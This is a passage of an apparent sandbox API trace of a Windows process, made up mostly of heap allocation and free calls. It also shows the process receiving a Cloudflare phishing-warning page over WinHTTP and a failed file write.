(HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472d0 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3ad10 | out: hHeap=0xb80000) returned 1 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c18 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3ad10 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3aa70 [0268.371] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.371] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c40 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472f0 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3aa58 [0268.371] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472f0 | out: hHeap=0xb80000) returned 1 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3aa88 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472f0 [0268.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4050 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xfd2) returned 0xe09d78 [0268.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0xe09d78, cbMultiByte=4050, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", lpUsedDefaultChar=0x0) returned 4050 [0268.371] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3aa88 | out: hHeap=0xb80000) returned 1 [0268.371] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xfe0) returned 0xe0fc98 [0268.371] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe09d78 | out: hHeap=0xb80000) returned 1 [0268.372] GetLastError () returned 0x0 [0268.372] SetLastError (dwErrCode=0x0) [0268.372] GetLastError () returned 0x0 [0268.372] SetLastError (dwErrCode=0x0) [0268.372] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xbc4290, nNumberOfBytesToWrite=0xfd1, lpNumberOfBytesWritten=0x75d9c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x75d9c8, lpOverlapped=0x0) returned 0 [0268.372] GetLastError () returned 0x6 [0268.372] GetLastError () returned 0x6 [0268.372] SetLastError (dwErrCode=0x6) [0268.372] GetLastError () returned 0x6 [0268.372] SetLastError (dwErrCode=0x6) [0268.372] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe0fc98 | out: hHeap=0xb80000) returned 1 [0268.372] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472f0 | out: hHeap=0xb80000) returned 1 [0268.372] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3aa58 | out: hHeap=0xb80000) returned 1 [0268.372] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.372] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5c40 | out: hHeap=0xb80000) returned 1 [0268.372] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.372] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbb0d8 | out: hHeap=0xb80000) returned 1 [0268.372] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbe6eb8 | out: hHeap=0xb80000) returned 1 [0268.373] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1928 | out: hHeap=0xb80000) returned 1 [0268.373] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99df0 | out: hHeap=0xb80000) returned 1 [0268.373] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d00 | out: hHeap=0xb80000) returned 1 [0268.373] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a708 | out: hHeap=0xb80000) returned 1 [0268.373] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18c8 | out: hHeap=0xb80000) returned 1 [0268.373] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe050 | out: hHeap=0xb80000) returned 1 [0268.373] WinHttpRequest:IUnknown:Release (This=0xbc3298) returned 0x0 [0268.374] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbb120 | out: hHeap=0xb80000) returned 1 [0268.374] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a498 | out: hHeap=0xb80000) returned 1 [0268.374] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99af0 | out: hHeap=0xb80000) returned 1 [0268.374] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a618 | out: hHeap=0xb80000) returned 1 [0268.374] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b78 | out: hHeap=0xb80000) returned 1 [0268.374] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe1e0 | out: hHeap=0xb80000) returned 1 [0268.374] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1978 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d78 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99c40 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ce8 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99bc8 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a678 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99dd8 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99b80 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99e08 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a660 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbb048 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d48 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9f350 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ad8 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d60 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe078 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18f8 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe190 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe0dce0 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47260 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3aa70 | out: hHeap=0xb80000) returned 1 [0268.375] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3ad10 | out: hHeap=0xb80000) returned 1 [0268.376] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5c18 | out: hHeap=0xb80000) returned 1 [0268.376] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472d0 | out: hHeap=0xb80000) returned 1 [0268.376] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5790 | out: hHeap=0xb80000) returned 1 [0268.376] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a6d8 | out: hHeap=0xb80000) returned 1 [0268.376] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472d0 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5790 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a6d8 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47260 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d60 [0268.376] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47260 | out: hHeap=0xb80000) returned 1 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x16) returned 0xca7998 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47260 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ad8 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472b0 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c18 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472f0 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x44) returned 0xdb4100 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4c) returned 0xd88328 [0268.376] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5b50 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d48 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47290 [0268.377] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d48 | out: hHeap=0xb80000) returned 1 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5998 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc99d48 [0268.377] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5c18 | out: hHeap=0xb80000) returned 1 [0268.377] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472f0 | out: hHeap=0xb80000) returned 1 [0268.377] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ad8 | out: hHeap=0xb80000) returned 1 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c18 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ad8 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472f0 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.377] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5948 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a660 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47300 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99e08 [0268.377] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99b80 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472a0 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99dd8 [0268.377] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.377] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a678 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47270 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99bc8 [0268.378] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99ce8 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472e0 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99c40 [0268.378] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d78 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47310 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a618 [0268.378] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99af0 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47320 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a498 [0268.378] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a318 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47330 [0268.378] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a450 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a228 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47340 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xbbb048 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5948 | out: hHeap=0xb80000) returned 1 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a270 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472c0 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47350 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472c0 | out: hHeap=0xb80000) returned 1 [0268.379] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2b8 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ad8 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472f0 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a660 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99e08 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47300 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99b80 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99dd8 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472a0 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a678 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99bc8 | out: hHeap=0xb80000) returned 1 [0268.379] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47270 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99ce8 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99c40 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472e0 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d78 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a618 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47310 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99af0 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a498 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47320 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a318 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a450 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47330 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a228 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47340 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47350 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbb048 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d48 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5c18 | out: hHeap=0xb80000) returned 1 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472b0 | out: hHeap=0xb80000) returned 1 [0268.380] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d48 [0268.380] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d60 | out: hHeap=0xb80000) returned 1 [0268.381] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a6d8 | out: hHeap=0xb80000) returned 1 [0268.381] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5790 | out: hHeap=0xb80000) returned 1 [0268.381] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472d0 | out: hHeap=0xb80000) returned 1 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5790 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a6d8 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472d0 [0268.381] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a6d8 | out: hHeap=0xb80000) returned 1 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5c18 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a6d8 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d60 [0268.381] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99d48 | out: hHeap=0xb80000) returned 1 [0268.381] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472b0 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47350 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5948 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99d48 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47340 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2b8 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47330 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca78f8 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47320 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xc9f350 [0268.381] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.381] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.382] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x80) returned 0xbe6e30 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9f350 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.382] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca78f8 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47330 | out: hHeap=0xb80000) returned 1 [0268.382] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47340 | out: hHeap=0xb80000) returned 1 [0268.382] 